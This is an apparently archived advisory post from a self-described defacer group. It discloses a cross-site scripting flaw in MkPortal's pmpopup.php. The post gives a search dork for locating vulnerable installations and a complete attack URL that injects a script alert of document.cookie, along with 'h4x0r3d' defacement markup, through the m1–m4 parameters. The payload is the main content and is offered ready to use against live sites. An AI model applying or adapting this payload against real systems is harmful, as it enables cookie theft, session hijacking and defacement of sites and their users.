<<< Date Index >>>     <<< Thread Index >>>

MkPortal Cross Site Scripting (All versions) xSS



#By: HanowarS

#mail: vannovax[at]gmail.com

#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz

#web: www.div.com.ve and www.c-group.org

#ALL VERSIONS!!

# Latin American Defacers

############################


Dork:

MKPortal M1.1 Rc1 ©2003-2005 All rights reserved


Hilo:

/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>


Affected File:


pmpopup.php


Example:


http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>